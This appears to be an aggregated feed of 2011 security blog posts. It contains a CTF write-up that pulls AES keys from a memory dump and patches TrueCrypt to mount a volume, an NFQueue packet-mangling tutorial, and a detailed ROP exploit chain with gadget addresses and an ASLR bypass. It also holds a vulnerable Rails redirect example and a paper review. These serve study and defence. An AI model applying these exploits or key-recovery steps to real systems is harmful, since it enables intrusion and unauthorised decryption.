f0887dbdb886bbce1d09192c46d78bba7767303042f20f9e97f4a2ee9a069c19
896fc79ff18f46ec0300545c5bde9296ad29fd8abf019cbcc4286d680df23ef7
374fb5bf43bcc26f310dd6dd58dec6ca33047ae03810315e969c3149c9da539f
2d01ca16d2ec47826d5b7f7b69d31017a8d05433be7447d9e50989fc5f4662d6
461e700719d173152baa731904886f6c53e82a369c82e066c6575955a70678ed

FOUND POSSIBLE 256-BIT KEY AT BYTE 11674d4

KEY: 9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d

EXTENDED KEY:
9b18635534875fc2ba1a74616e961caa
aa907d8b285c7625bb44eb256b8de59d
c7c13d2af34662e8495c168927ca0a23
66e41aad4eb86c88f5fc87ad9e716230
666b3921952d5bc9dc714d40fbbb4763
690eba5627b6d6ded24a51734c3b3343
80a82308158578c1c9f43581324f72e2
4a8aface6d3c2c10bf767d63f34d4e20
6b8794057e02ecc4b7f6d94585b9aba7
dddc9892b0e0b4820f96c9e1fcdb87c1
c290ecb5bc9200710b64d9348edd7293
c41dd84e74fd6ccc7b6ba52d87b022ec
050322a2b99122d3b2f5fbe73c288974
2f297fdc5bd4131020bfb63da70f94d1
33211cfe8ab03e2d3845c5ca046d4cbe

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
d9ea24470c5bf1b15f3fe8d33eb683089a7ff9f198bb75cd3d2d8bed76e54625
f3acc19f88a6775a9e5c1d35828683225f9eebc3f912bd22c286ca034f297f9f
60f8969f3f106db49ffe4e6b1cda9e1776e957cf4dc7c9544c8871c38dafb59c
05a596765f1e018fb150a1bf8324d07caadd339decc14ac9b02f10f1c127c45f
5738b9015cbe40304bcdd62f327471c33b9672c7ada60c16d749078f7108d4ae
ca866774b97f05196d03a57579b9a7ec241885799511a598317b9cd2a641d321
b0823347a1175dd64d710fca14ba0299489e0a17bc3d358e83c3ff1b3c9ac97e

FOUND POSSIBLE 256-BIT KEY AT BYTE 7d852cc

KEY: 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f

EXTENDED KEY:
000102030405060708090a0b0c0d0e0f
101112131415161718191a1b1c1d1e1f
a573c29fa176c498a97fce93a572c09c
1651a8cd0244beda1a5da4c10640bade
ae87dff00ff11b68a68ed5fb03fc1567
6de1f1486fa54f9275f8eb5373b8518d
c656827fc9a799176f294cec6cd5598b
3de23a75524775e727bf9eb45407cf39
0bdc905fc27b0948ad5245a4c1871c2f
45f5a66017b2d387300d4d33640a820a
7ccff71cbeb4fe5413e6bbf0d261a7df
f01afafee7a82979d7a5644ab3afe640
2541fe719bf500258813bbd55a721c0a
4e5a6699a9f24fe07e572baacdf8cdea
24fc79ccbf0979e9371ac23c6d68de36

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
6948172fbb0d7ded3b16ce30696cda326d54b8480a0e0a0e0a0e0a0e0a0e0a0e
b29a81a5000000000000000000000000720676bd000000000000000000000000
69b5cd83000000000000000000000000fec82ba5000000000000000000000000
58fbba6f000000000000000000000000e2d69177000000000000000000000000
1fe3a63900000000000000000000000031467b85000000000000000000000000
b6a85bf0000000000000000000000000deaed73f000000000000000000000000
7cdc8bf900000000000000000000000045804db8a3b9352ffd620c9386f2fa8e
##########################

 

The “constraint on rows”-output tells us that the expanded keys are valid according to the AES key schedule. If we had bit errors in the respective memory regions (likely in cold boot attacks), not all constraints would have been met and AESKeyFinder would have calculated a guess for the original valid key.

So we have three keys after only a few seconds of runtime – so far so good.

  1. f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6
  2. 9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d
  3. 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
The entropy of (3) is really low, and we can definitely exclude it if we assume TrueCrypt is not totally broken. This is good news since we have exactly two remaining 256-bit AES keys, as used by TrueCrypt in default configuration (AES in XTS mode).
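
For XTS, the two keys end up side by side in one 64-byte buffer. The small sketch below builds that buffer and prints it as a C string literal. It assumes key (1) is the master key and key (2) the secondary key, which is the order used in the patch further down; `c_escape` is a helper made up for this example.

```python
KEY_1 = "f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6"
KEY_2 = "9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d"


def c_escape(data: bytes) -> str:
    """Render bytes as \\xNN escapes suitable for a C string literal."""
    return "".join("\\x%02x" % b for b in data)


# Master key first, secondary (tweak) key second: an assumption, see above.
xts_key = bytes.fromhex(KEY_1) + bytes.fromhex(KEY_2)

if __name__ == "__main__":
    print(len(xts_key))
    print('"%s"' % c_escape(xts_key))
```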

Patching TrueCrypt

Next we read the source of TrueCrypt. Remember that TrueCrypt first decrypts the header with the password, and then reads the AES keys from the decrypted header. Reading in the header is done in Volume/VolumeHeader.cpp:VolumeHeader::Deserialize(.,.,.). We patch the code there, right where the master and secondary keys are read from the decrypted header, and replace them with the hard-coded key values we found in the previous step. Our quick and dirty patch looks as follows:
--- truecrypt-7.0a-source/Volume/VolumeHeader.cpp
+++ truecrypt-7.0a-source.patched//Volume/VolumeHeader.cpp
@@ -6,6 +6,10 @@
+#include <iostream>
+#include <cstdlib>
+#include <cstdio>
+#include <fstream>
#include "Crc32.h"
#include "EncryptionModeXTS.h"
#include "Pkcs5Kdf.h"
@@ -201,8 +206,19 @@ namespace TrueCrypt
 

if (typeid (*mode) == typeid (EncryptionModeXTS))
{
-                       ea->SetKey (header.GetRange (offset, ea->GetKeySize()));
-                       mode->SetKey (header.GetRange (offset + ea->GetKeySize(), ea->GetKeySize()));
+
+                       char * buffer = (char *)malloc(65);
+                       buffer[64] = '\x00';
+                       memcpy(buffer, "\xf0\xcb\xf2\x60\xe0\xca\x8e\xc2\x43\x10\x89\xfb\x39\x3a\x1c\x29\x51\x3a\xaa\xa5\x84\x7d\x13\xe8\xbe\x84\x76\x09\x68\xe6\x4d\xc6\x9b\x18\x63\x55\x34\x87\x5f\xc2\xba\x1a\x74\x61\x6e\x96\x1c\xaa\xaa\x90\x7d\x8b\x28\x5c\x76\x25\xbb\x44\xeb\x25\x6b\x8d\xe5\x9d", 64);
+                       //ea->SetKey (header.GetRange (offset, ea->GetKeySize()));
+
+                       ConstBufferPtr cbp = (ConstBufferPtr( (TrueCrypt::byte*) buffer, 32));
+                       ea->SetKey (cbp);
+
+                       ConstBufferPtr cbpm = (ConstBufferPtr( (TrueCrypt::byte*) buffer +32, 32));
+                       //mode->SetKey (header.GetRange (offset + ea->GetKeySize(), ea->GetKeySize()));
+                       mode->SetKey (cbpm);
+
}
else
{
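The 64-byte string in the patch is just key (1) followed by key (2), written as C hex escapes. Typing that by hand is error-prone, so here is a small Python sketch that generates it from the hex strings. The names `PRIMARY_KEY_HEX`, `SECONDARY_KEY_HEX` and `c_string_literal` are our own and appear nowhere in TrueCrypt.

```python
# Keys (1) and (2) from the key finder, in the order the patch passes them
# to ea->SetKey and mode->SetKey respectively.
PRIMARY_KEY_HEX = "f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6"
SECONDARY_KEY_HEX = "9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d"

def c_string_literal(data):
    """Render bytes as the body of a C string literal made of \\xNN escapes."""
    return "".join("\\x%02x" % b for b in data)

key_material = bytes.fromhex(PRIMARY_KEY_HEX) + bytes.fromhex(SECONDARY_KEY_HEX)
literal = c_string_literal(key_material)

# Paste the printed line into the memcpy() call of the patch.
print('"%s"' % literal)
```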

Mounting the Volume

In order for TrueCrypt to reach the patched code it must first correctly decrypt a valid header. So we copy the header from an identically sized TrueCrypt volume configured with the default parameters:

$ dd of=ppp.challenge.vol if=weknowthepasswd.vol bs=512 count=1 conv=notrunc

and open ppp.challenge.vol with the patched TrueCrypt software and find the file KEY.TXT in the correctly decrypted volume.
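For readers without dd at hand, the header transplant can be sketched in Python as well. This assumes, as the dd command does, that the header of interest is the first 512 bytes; `copy_header` is a hypothetical helper name.

```python
def copy_header(src_path, dst_path, size=512):
    """Overwrite the first `size` bytes of dst_path with those of src_path.

    Opening the destination in "r+b" mode rewrites it in place without
    truncating it, which is what conv=notrunc does for dd.
    """
    with open(src_path, "rb") as src:
        header = src.read(size)
    with open(dst_path, "r+b") as dst:
        dst.write(header)
    return len(header)
```

Calling `copy_header("weknowthepasswd.vol", "ppp.challenge.vol")` would then play the role of the dd invocation.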

 

Summary

This was a really nice challenge letting us explore TrueCrypt internals. If you think this is too complicated – you are right. You can also solve the challenge with available tools: http://www.lestutosdenico.com/tutos-de-nico/write-up-fun-with-firewire-plaidctf 

People involved in solving this challenge: Clemens Hlauschek, Michael Weissbacher

by Michael at May 18, 2011 04:26 AM

May 10, 2011

Yan Alexandrovich Shoshitaishvili

NFQueue packet mangling with Python

In Linux, iptables provides a pretty slick way to hand packets to userland so they can be mangled or analyzed before going back to the kernel. Normally, this is done with C, but there are also bindings to friendlier languages, such as Python. Unfortunately, these bindings have very little documentation. While there are some examples for simple accept/reject decisions (https://www.wzdftpd.net/blog/index.php?post/2008/06/01/22-nfqueue-bindings and http://184.73.202.106/a/content/2010-08-01/instant-steganography-scapy-and-nfqueue), there seems to be a lack of more intricate showcases of this capability.

Well, today we push the envelope!

I was writing something for which I needed to drop packets to userland, mangle them, and then hand the modified version back to the kernel. The approach is pretty much identical to the nfqueue part of the posts linked to earlier with the exception of the method of setting the verdict, which took me a little while to track down. Basically, we first set up the iptables rules:


# iptables -A OUTPUT -p tcp -j NFQUEUE

Then, in our code, we do the standard nfqueue stuff (none of this is really different from what's linked to above):


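import socket

import nfqueue

def cb(dummy, payload):
        # packet handling goes here; every packet must receive a verdict
        payload.set_verdict(nfqueue.NF_ACCEPT)

q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0)  # queue number 0, the default for the NFQUEUE target
try:
        q.try_run()  # blocks, invoking cb for each queued packet
except KeyboardInterrupt:
        print("Exiting...")
q.unbind(socket.AF_INET)
q.close()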

All the interesting stuff happens in the callback function. For example, if we wanted to (using scapy) change the ttl of all outgoing packets to 10, we would do:


from scapy.all import IP
def cb(dummy, payload):
        pkt = IP(payload.get_data())
        # set the TTL
        pkt.ttl = 10
        # clear the IP checksum so that Scapy recalculates it, since we modified the IP header
        del pkt.chksum
        # reinject the packet!
        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
 
And that's it. Basically, we're using the set_verdict_modified() function instead of set_verdict(), and it takes the verdict, the modified packet, and the length of the modified packet as arguments. Of course, for something simple like setting the TTL, you can just use iptables without dropping the packet to userland, but this should illustrate the basic idea.
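The `del pkt.chksum` line matters because the IPv4 header checksum covers the TTL field, so a changed TTL with a stale checksum gives an invalid packet. Scapy does the recalculation for you; the following standalone Python 3 sketch only shows what is being recomputed. The sample header (a UDP packet from 192.168.0.1 to 192.168.0.199) and the helper name `ipv4_checksum` are illustrative choices, not part of nfqueue or Scapy.

```python
import struct

def ipv4_checksum(header):
    """Ones'-complement checksum of an IPv4 header, ignoring the stored checksum."""
    # Zero the checksum field (bytes 10-11) before summing the 16-bit words.
    header = header[:10] + b"\x00\x00" + header[12:]
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    # Fold the carries back into the low 16 bits.
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# 20-byte sample header: TTL is the byte at offset 8, checksum at offsets 10-11.
original = bytes.fromhex("4500007300004000" "4011b861" "c0a80001" "c0a800c7")

# Same header with the TTL set to 10, as in the callback above.
modified = original[:8] + bytes([10]) + original[9:]

print(hex(ipv4_checksum(original)), hex(ipv4_checksum(modified)))
```

The two values differ, so the checksum stored in the original header no longer matches once the TTL is rewritten.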

Keep in mind that since you're mangling packets, you might screw up the behavior of the underlying applications. For example, if you inject extra data into or remove data from a TCP packet, you might screw up the sequence numbers and pretty much break the connection. Good luck!

by Zardus (noreply@blogger.com) at May 10, 2011 12:34 AM

April 29, 2011

Gianluca Stringhini

PlaidCTF 2011 Challenge #17: C++5x writeup

This is a challenge that required a lot of work from Zardus and me, but we think that the solution we came up with is really interesting. Some other teams apparently just disabled libc ASLR to make things easier; instead, we dynamically calculated the address of the exec() we wanted to call and jumped to it.

The challenge involved a C++ binary with the following usage:


  # ./first_cpp
  Usage: ./first_cpp <name> <point>


The binary creates a C++ object (which has one method) on the stack in main(), and then calls a function which has an unrestricted buffer overflow followed by a call to the aforementioned method. As well as the overflow, the second function conveniently copies part of the buffer into the bss.

  void __cdecl stupid_function(int obj_ptr, int points, int name_ptr)
  {
    char src; // [sp+26h] [bp-32h]@1

    sprintf(&src, "Uploading... [%s]: %d pts\n", name_ptr, points);
    memcpy(s, &src, 0x32u);
    (**(int (__cdecl ***)(_DWORD, _DWORD))obj_ptr)(obj_ptr, s);
    send_to_localhost();
  }



It is important to note that the function with the overflow never returns: send_to_localhost() calls exit() after sending a UDP packet to localhost containing the points variable.

Normally, exploiting this would be a piece of cake. However, the machine had both ASLR and NX enabled and functional. A further complication was the absence of any helpful libc calls in the GOT, since the binary does not call such functions.

The answer lies in the method call. Since the C++ object resides on the stack, and we can overwrite it with the buffer overflow, we can change the address that is eventually called. A C++ method call in such a fashion consists of the following instructions:


  mov     eax, [ebp+obj_ptr]
  mov     eax, [eax]
  mov     edx, [eax]
  mov     dword ptr [esp+4], offset s
  mov     eax, [ebp+obj_ptr]
  mov     [esp], eax
  call    edx


The first mov dereferences the pointer (passed as an argument to the function) into the location of the object on the stack (the first word of which is the location of the virtual table for the object). The second mov acquires the address of the virtual table, and the third mov gets the address of the function to be called. The exploit involves overwriting the object on the stack to point to our own fake virtual table, which is conveniently copied for us into the bss. Luckily, the bss remains stable in memory, which makes this task fairly easy.
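To make the double dereference concrete, here is a toy Python model of the dispatch, with memory as a dictionary from address to stored word. Every address in it is invented for illustration and has nothing to do with the real binary.

```python
# Invented addresses for a toy 32-bit memory (address -> word stored there).
OBJ = 0x1000           # the object on the stack
REAL_VTABLE = 0x2000   # the compiler-generated virtual table
FAKE_VTABLE = 0x3000   # attacker-controlled data at a fixed address
REAL_METHOD = 0x4000   # the object's only method
GADGET = 0x5000        # where the attacker wants execution to go

memory = {
    OBJ: REAL_VTABLE,          # first word of the object: vtable pointer
    REAL_VTABLE: REAL_METHOD,  # first vtable slot: method address
    FAKE_VTABLE: GADGET,       # first slot of the fake table
}

def call_target(obj_ptr):
    """Mirror the mov/mov/call sequence and return the address that gets called."""
    eax = memory[obj_ptr]  # mov eax, [eax]: fetch the vtable pointer
    edx = memory[eax]      # mov edx, [eax]: fetch the first vtable slot
    return edx             # call edx

before = call_target(OBJ)
memory[OBJ] = FAKE_VTABLE  # the overflow rewrites the object's first word
after = call_target(OBJ)
print(hex(before), hex(after))
```

Only one word of the object changes, yet the call lands wherever the fake table says.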

The general idea of the exploit is as follows: first, we load the address of a libc function that *is* in the GOT into eax. Then, using the offset between that function and a call to exec (we didn't use system() because system() drops privileges), we increment eax until it points to the exec call. Finally, we jump to a "call eax" instruction. This works because even though libc is in a random location, the relative offsets between the functions are the same. We calculated the offset by subtracting the address of the libc function from the address of the exec call in gdb on the target machine:


  (gdb) p atoi
  $5 = {int (const char *)} 0xf7d50b40
  (gdb) x/i do_system+1128
     0xf7d5c398 : call   0xf7dbc3f0 <__execve>
  (gdb) p 0xf7d5c398 - 0xf7d50b40
  $6 = 47192
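The same arithmetic in Python, as a sketch of why ASLR does not matter once one libc address is known. The two constants are the addresses from the gdb session above; `execve_call_address` is a name we made up.

```python
# Addresses observed in the gdb session (one particular ASLR layout).
ATOI_IN_GDB = 0xF7D50B40
EXECVE_CALL_IN_GDB = 0xF7D5C398

# The distance between the two is fixed by the libc build, not by ASLR.
OFFSET = EXECVE_CALL_IN_GDB - ATOI_IN_GDB

def execve_call_address(atoi_runtime):
    """Given atoi's address in the current run, locate the call to execve."""
    return (atoi_runtime + OFFSET) & 0xFFFFFFFF

print(OFFSET)
```

Whatever base libc is loaded at, adding `OFFSET` to the atoi address read from the GOT gives the matching execve call site.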


In order to carry out our exploit, we ended up using some pretty intricate return-oriented programming. We found several gadgets to help us:

  1. POP_RET: a simple pop, return gadget at 0x080487a1 to clean up the stack after a call
  2. POP3_RET: a simple pop, pop, pop, return gadget at 0x08048a2f for the same reason
  3. JUST_RET: a ret instruction at 0x08048a32 to ret to our next destination
  4. LEAVE_RET: a leave, ret gadget at 0x080487a1
  5. The sprintf stub function call, always at 0x080485ec
  6. A piece of code at 0x08048949 which reads a local variable into eax and eventually calls sendto:

      mov eax, [ebp-0x1C]
      mov [esp], eax
      call _sendto

  7. A piece of code at 0x0804890f which adds 8 to eax and soon calls bzero:

      add eax, 8
      mov [esp], eax
      call _bzero

  8. A piece of code at 0x0804879F which calls eax

The beginning of our exploit is:

  -------- copied into bss ---------
  00. "AAAA"
  04. "AAAA"
  08. "AAAA"
  12. POP3_RET
  16. POP_RET
  20. "\xe2\x9d\x04\x08"
  24. "\xea\x9d\x04\x08"
  28. LEAVE_RET
  32. "%.4s"
  -------- on the stack ---------
  36. "BBBB"
  40. POP_RET
  44. "\xe6\x9d\x04\x08"


The first 36 bytes are conveniently copied into the bss, and are used through the rest of the return-oriented program. When the buffer is overflowed, (44) ends up getting written over the virtual table pointer for the C++ object. It then resolves to (24), which resolves to (28). The program then calls LEAVE_RET, which moves ebp (currently pointing at 36) back to esp, allowing us to bypass the inconvenient values on the stack which were copied into the bss. "BBBB" is popped into ebp and we return to the POP_RET instruction (40). This POP_RET allows us to skip over the fake virtual table pointer on the stack. Then the following happens:


  48. POP_RET
  52. "\xe6\x9d\x04\x08"


This pops an address (52) into ebp and returns again. We did this so that ebp would point to writeable memory, as functions sometimes expect it to. After this, we copy atoi's address to get ready to read it:


  56. "\xec\x85\x04\x08"
  60. POP3_RET
  64. "\xd4\x9d\x04\x08"
  68. "\xee\x9d\x04\x08"
  72. "\x58\x9d\x04\x08"


(56) is the address of sprintf, which we will use to overwrite memory addresses. The destination, (64), lies in the dtors section; we chose it arbitrarily as storage space. The format string, (68), is a pointer to (32) on the bss, and copies 4 bytes. Finally, the argument, (72), is a pointer to atoi's entry in the GOT. We set sprintf's return address (60) to POP3_RET, which cleans the arguments off the stack. After this, we have atoi's address at 0x08049dd4. Now we do a bit of cleanup for future actions:
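The byte strings in these listings are just 32-bit addresses in little-endian order. As a sketch, the sprintf frame at (56) through (72) can be rebuilt in Python from the addresses named in the text; POP3_RET is the gadget address from the list above.

```python
import struct

POP3_RET = 0x08048A2F

# One fake call frame: function, return address, then three cdecl arguments.
frame = struct.pack(
    "<5I",
    0x080485EC,  # (56) the sprintf stub we "return" into
    POP3_RET,    # (60) sprintf's return address: pops the three arguments
    0x08049DD4,  # (64) destination: scratch space in .dtors
    0x08049DEE,  # (68) format string: "%.4s" sitting in the bss
    0x08049D58,  # (72) source: atoi's GOT entry
)
print(frame.hex())
```

Each later block that calls sprintf follows the same five-word pattern with different destination and source addresses.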


  76. "\xec\x85\x04\x08"
  80. POP3_RET
  84. "\x3c\x9d\x04\x08"
  88. "\xee\x9d\x04\x08"
  92. "\xda\x9d\x04\x08"

  96. "\xec\x85\x04\x08"
  100. POP3_RET
  104. "\x64\x9d\x04\x08"
  108. "\xee\x9d\x04\x08"
  112. "\xda\x9d\x04\x08"


These two blocks use sprintf to overwrite the GOT entries for sendto (84) and bzero (104). Both of them are overwritten with the value of POP3_RET (12) in bss, which has the result of turning both sendto and bzero into a pop,pop,pop,ret gadget. Then, we move on:


  116. POP_RET
  120. "\xe0\x9d\x04\x08" # 0x8049dec -- where we wrote - 1C
  124. "\x49\x89\x04\x08" # get atoi address into eax
  128. JUST_RET
  132. JUST_RET
  136. JUST_RET
  140. JUST_RET


(116) pops (120) into ebp, which is (64), the address where we copied atoi's address, plus 0x1C. It then returns to (124), which is code gadget (6). This has the effect of moving atoi's address into eax. That gadget ends up calling sendto, which is now POP3_RET, which ends up cleaning up our stack (including the unwanted return address that the call instruction pushes) and returning. We then return to:


  for i in range(5883):
    144. "\x0f\x89\x04\x08"
    148. "AAAA"
    152. "AAAA"


This is an unrolled loop that increments eax by 8 on each pass using code gadget (7), whose address sits at (144). That gadget ends in a call to bzero, which is now POP3_RET; it pops off the return address pushed by the call along with (148) and (152), and returns into the next copy of the gadget. This runs 5883 times, which is the distance between atoi and the execve call (47064) divided by 8. Finally, we return to code gadget 8:
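Here is a short Python sketch of how such an unrolled loop can be generated, using the gadget address and iteration count quoted in the text. The variable names are ours.

```python
import struct

ADD_EAX_8 = 0x0804890F  # code gadget (7): add eax, 8 ... call _bzero
ITERATIONS = 5883

# One round: the gadget address plus two filler words. Together with the
# return address pushed by the call, these are the three words POP3_RET pops.
one_round = struct.pack("<I", ADD_EAX_8) + b"AAAA" * 2
chain = one_round * ITERATIONS

# Total payload size in bytes, and the total amount added to eax.
print(len(chain), ITERATIONS * 8)
```

At 12 bytes per round, this part of the payload alone runs to roughly 70 KB.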


  156. "\x9f\x87\x04\x08"
  160. "\xf2\x9d\x04\x08"
  164. "\xf2\x9d\x04\x08"


(160) and (164) point to zero-filled space in the bss for the args and env of the execve call. The program name, unfortunately, is co-opted by the call instruction pushing the return value. Luckily, that return value points to a "string" in the code section and we can create the appropriate file.

And, after all that horror, we're done!

by Gianluca Stringhini (noreply@blogger.com) at April 29, 2011 02:31 PM

April 21, 2011

Adam Doupé

Overview of Execution After Redirect Web Application Vulnerabilities

Hi all, I’m here to talk about a little-known web vulnerability that Bryce Boe already touched on. Execution After Redirects are logic flaws in web applications that can lead to Information Disclosure and Broken Access Controls.

What’s an EAR?

Well, an Execution After Redirect (EAR) flaw is when a developer causes an HTTP redirect to occur, typically via a web framework. The developer assumes that execution stops after the redirect; however, execution continues.

Let’s look at a Ruby on Rails example (names have been changed to hide the guilty):

class TopicsController < ApplicationController
  def update
    @topic = Topic.find(params[:id])
    unless current_user.is_admin?
      redirect_to "/"
    end
    if @topic.update_attributes(params[:topic])
      flash[:notice] = "Topic updated!"
    end
  end
end

It appears that if the current user is not an admin, they are redirected to “/”, the web site root. In fact, if you access the update controller using a browser while not an admin, it will redirect you to the web site root as expected. However, if an attacker who is not an admin makes a request with topic parameters, she will be able to update your topic without being an admin!

How do I fix it?

The fix is pretty simple: always return after a redirect!
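The pattern is not specific to Rails. As a framework-free sketch in Python, with a made-up `Response` class whose `redirect_to` only records the redirect (as many framework helpers do), the bug and the fix look like this:

```python
class Response:
    """Hypothetical stand-in for a framework response object."""

    def __init__(self):
        self.location = None

    def redirect_to(self, url):
        # Only records the redirect; it does not stop the calling handler.
        self.location = url


def update_vulnerable(resp, is_admin, topic, new_title):
    if not is_admin:
        resp.redirect_to("/")
    topic["title"] = new_title  # still runs for non-admins: this is the EAR


def update_fixed(resp, is_admin, topic, new_title):
    if not is_admin:
        resp.redirect_to("/")
        return  # stop executing the handler after the redirect
    topic["title"] = new_title


topic = {"title": "original"}
update_vulnerable(Response(), False, topic, "pwned")
print(topic["title"])
```

In both versions the non-admin gets redirected to "/"; only the fixed one leaves the topic untouched.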

EARs can be more complicated. For example, there’s a controller that calls a method that calls a redirect. The real fix is to know where your redirects are, and what they’re for, especially if you use a redirect during authentication.

What else is vulnerable?

Web application frameworks differ on whether they stop execution after a redirect. Check your web framework’s documentation to see if the redirect method stops execution.

What am I doing about it?

Bryce Boe and I are writing a paper studying this problem in depth. However, since I am alerting developers to potential EARs in their code, I wanted to have this informational blog post giving an overview. In addition, I developed a tool to statically detect EARs in Ruby on Rails. Look for more blog posts in the future about the tool.


April 21, 2011 03:23 AM

January 27, 2011

Adam Doupé

Paper Review: Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications.

What is this?

In an effort to improve my writing and analysis skills, I’m going to review papers using less than 500 words. This is my first attempt.

Overview

Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications is a paper written by Davide Balzarotti et al., and was published at the IEEE Symposium on Security and Privacy in 2008.

Saner attempts to solve the problem of verifying the correctness of sanitization functions. Previous work on analyzing web applications for vulnerabilities assumes that built-in sanitization functions completely protect the application from vulnerabilities. This assumption is typically extended to custom sanitization functions (regular expressions, string replacements, etc.).

Proper analysis of sanitization functions would enable a tool to be more precise about the vulnerabilities that it discovers. It can also be used to analyze a language’s built-in sanitization functions.

Saner utilizes static and dynamic approaches to analyze sanitization functions.

The static part was built by extending Pixy to keep track of the string values that each variable can hold. Saner can see if a variable can be used as output and if it is used in the output. However, the method used to keep track of the string values is an over-approximation, which might produce false-positives (but not false-negatives).

A dynamic approach is used to reduce the number of false-positives by generating inputs and seeing if those inputs trigger a vulnerability. In this way, Saner can present all the verified vulnerabilities, but if the user wishes, also present all the possible vulnerabilities so the user can investigate.

Thoughts

Possible Problems

Saner inherits the same limitations as Pixy, namely it does not support PHP’s eval function and aliased array elements.

Future Work

Context-aware

An extension to this (and other static web analyzers) would be to use the context of a variable's output in the HTML page. For instance, variables that output to the headers of an HTTP response are vulnerable to HTTP Response Splitting and need to disallow ‘\r’ and ‘\n’, while these characters are safe when output in the HTML response. Another example is a variable that is output after a starting script tag but before the ending tag to customize the JavaScript sent to the user. Here’s a simple example of this:

<script>
var userName = "<?php echo $userName; ?>";
</script>

In this case, restricting only ‘<’ and ‘>’ will not work. The idea of context can be extended to attributes of HTML tags.
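A quick way to see this is to simulate the template in Python. The sanitizer `strip_angle_brackets` and the `render` helper below are hypothetical stand-ins for the PHP page, written only to show that the payload needs no angle brackets at all.

```python
def strip_angle_brackets(value):
    """A sanitizer that is adequate for HTML text but not inside a JS string."""
    return value.replace("<", "").replace(">", "")

def render(user_name):
    # Mirrors: var userName = "<?php echo $userName; ?>";
    return 'var userName = "%s";' % strip_angle_brackets(user_name)

# The double quote closes the string literal; the rest runs as script.
payload = '"; alert(document.cookie); //'
print(render(payload))
```

The sanitizer passes the payload through untouched, because what matters in this context is the quote character, not the tag delimiters.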

Database-aware

Another problem is how to treat variables from the database: are they sanitized or not? A static analyzer that is able to properly model and taint the flow of data into and out of the database would be very cool (and if you know of someone who’s done this, let me know).


January 27, 2011 06:08 PM